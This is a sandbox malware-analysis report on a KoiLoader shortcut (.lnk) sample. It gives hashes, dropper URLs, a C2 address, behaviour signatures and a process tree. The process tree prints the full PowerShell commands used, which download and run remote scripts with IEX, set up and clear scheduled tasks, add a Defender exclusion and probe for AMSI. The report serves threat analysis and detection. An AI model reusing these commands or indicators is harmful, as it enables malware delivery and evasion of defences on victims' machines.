Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

d480330c8e...3c.lnk

windows7-x64

10

d480330c8e...3c.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 08:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk

  • Size

    3KB

  • MD5

    a8adbb0f006cbb7a70d7c2dcb0e2cff6

  • SHA1

    38f9fbf5a68943dc8f265191bb302722afed95d7

  • SHA256

    d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c

  • SHA512

    97686340a9b30c0516f8f7ac76a19a6547a6e407588dca5ac042ac767af0c57560059457e8042ccb2d3a031637d5ebd2d299e14446c6e0768c5cae75c1ae45fb

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Family

koiloader

C2

http://195.123.217.43/oversate.php

Attributes
  • payload_url

    https://www.italialife24.it/wp-content/uploads/2021/05

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 2 IoCs
    loader
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2180
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\GJTPLSHZOJFL.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\GJTPLSHZOJFL.js "
      2⤵
      • Blocklisted process makes network request
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
        3⤵
          PID:2020
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\GJTPLSHZOJFL.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z2QXMKBQ9BE'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4040
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5016
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4320
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2428
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\GJTPLSHZOJFL.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\GJTPLSHZOJFL.js "
        2⤵
        • Blocklisted process makes network request
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
          3⤵
            PID:2100
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\GJTPLSHZOJFL.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z271C6TDHLC'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3096
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\ra4172161-d53d-48af-8f36-a00b057e74d4r.js"
        1⤵
          PID:2120

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\GJTPLSHZOJFL.js
          Filesize

          1KB

          MD5

          77197cbc355d9d6e9239dc8f1e9e0b30

          SHA1

          89a579026f05d4978f305712ec42a8a169695b46

          SHA256

          ca3445b1c0046d2a27dfc6984d68ed73689920dd1921be4ed2aa60574174f42c

          SHA512

          6d1dcec5b0751a7efda736e927e8c56168d48bec1d2b594f62424997e00f8b75bf04b700f80e275a01d2cffb83a79558ebee0927c970175732795d43200408da

          Download Submit

        • C:\ProgramData\GJTPLSHZOJFL.js
          Filesize

          1KB

          MD5

          6e77d5788f8e8880e98af10e67b87c1d

          SHA1

          28aab1eea48c4d33268a163daa8c68632d66955c

          SHA256

          37851915224b5873a4ebb39885e543f61707dd10ea76f472fbd01114ce15ed31

          SHA512

          b2a852805dcd04c452441d53f7e98166dde62331ab47105cc9af21498e025e0c5db08ac489ede484e3923cb2a9a1a3b0c3ffbeae28d7d80493f3b1fb25e76a23

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          19KB

          MD5

          40ddb1f44a1493ebb5aabd0f57a089d0

          SHA1

          b2c7fe3da49ca701c5d626de8821585ddb13f27d

          SHA256

          79971e3092f0878926ba44c0a1fd8fda2beb6a08acb742d107ab4a54c37b4d02

          SHA512

          7b34d184ea709b81ff0bc2977d640d88981de3725aa30462a66c05a1b9467724c7874422d6f65cdbe82fb0dcfde3dfa797270198b039c3354afedb7c3fd5cf6c

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          477031a32089e6d066092d640b526add

          SHA1

          5041602c7c71b4c6e40928039dcc07b6b32a67f2

          SHA256

          0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

          SHA512

          01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          e936ffde1732f536cc835ed3e6c83842

          SHA1

          05a7c09e599c32003ea21329932a032ace4f592c

          SHA256

          da9997a3db22d4c3b7900392af3d4a88d09de0df6c4a75d89ea1b271edbb2552

          SHA512

          35d49450a82c671843080c2ff2ff0d33aa5640234958b7e417a9c2f9e20e24b752a4793a99662253e7ad892dcd70904f6524d5e71c0d80333d7d01741c115870

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          a5c074e56305e761d7cbc42993300e1c

          SHA1

          39b2e23ba5c56b4f332b3607df056d8df23555bf

          SHA256

          e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

          SHA512

          c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htfcstgu.jvz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js
          Filesize

          304B

          MD5

          9747ea89ca02ca1829c6c94c89c118d1

          SHA1

          3e397de2aa738fdcc17ea3a0bee40df5e69c3229

          SHA256

          5c0a7f17680adb26ea5d6f9b7e5bf507f839a40b468c857b69c02151f660e574

          SHA512

          12dacfce38d547f34d2b33864ac50dd102973ad6b013015114695ae4c73b3a24b660779a26b7defce1dc5d1bccb3d3dcd386b6c5859facd8005b8ed9e5d1371b

          Download Submit

        • memory/2288-56-0x00000000077E0000-0x00000000077ED000-memory.dmp

          Filesize

          52KB

          Download

        • memory/2288-38-0x0000000005730000-0x0000000005796000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2288-39-0x00000000057A0000-0x0000000005806000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2288-49-0x00000000059D0000-0x0000000005D24000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2288-37-0x0000000004FF0000-0x0000000005012000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2288-51-0x0000000006060000-0x000000000607E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2288-52-0x0000000006090000-0x00000000060DC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2288-53-0x0000000006450000-0x000000000646A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2288-54-0x00000000078F0000-0x0000000007F6A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/2288-55-0x0000000007740000-0x0000000007741000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2288-35-0x0000000004A20000-0x0000000004A56000-memory.dmp

          Filesize

          216KB

          Download

        • memory/2288-36-0x0000000005090000-0x00000000056B8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/2428-84-0x00000000075E0000-0x00000000075F1000-memory.dmp

          Filesize

          68KB

          Download

        • memory/2428-69-0x0000000007070000-0x00000000070A2000-memory.dmp

          Filesize

          200KB

          Download

        • memory/2428-81-0x00000000072B0000-0x0000000007353000-memory.dmp

          Filesize

          652KB

          Download

        • memory/2428-82-0x0000000007450000-0x000000000745A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2428-83-0x0000000007660000-0x00000000076F6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/2428-70-0x00000000704F0000-0x000000007053C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2428-94-0x0000000007620000-0x000000000762E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/2428-95-0x0000000007630000-0x0000000007644000-memory.dmp

          Filesize

          80KB

          Download

        • memory/2428-96-0x0000000007720000-0x000000000773A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2428-97-0x0000000007700000-0x0000000007708000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2428-80-0x0000000007030000-0x000000000704E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3096-134-0x00000000079C0000-0x00000000079CD000-memory.dmp

          Filesize

          52KB

          Download

        • memory/4020-2-0x00007FFA24463000-0x00007FFA24465000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4020-18-0x00007FFA24460000-0x00007FFA24F21000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4020-14-0x00007FFA24460000-0x00007FFA24F21000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4020-13-0x00007FFA24460000-0x00007FFA24F21000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4020-3-0x000001AA6A3D0000-0x000001AA6A3F2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5016-103-0x0000000007FD0000-0x0000000008020000-memory.dmp

          Filesize

          320KB

          Download

        • memory/5016-104-0x00000000080C0000-0x0000000008152000-memory.dmp

          Filesize

          584KB

          Download

        • memory/5016-102-0x0000000007F30000-0x0000000007F4A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/5016-101-0x00000000084E0000-0x0000000008A84000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/5016-100-0x0000000007760000-0x0000000007782000-memory.dmp

          Filesize

          136KB

          Download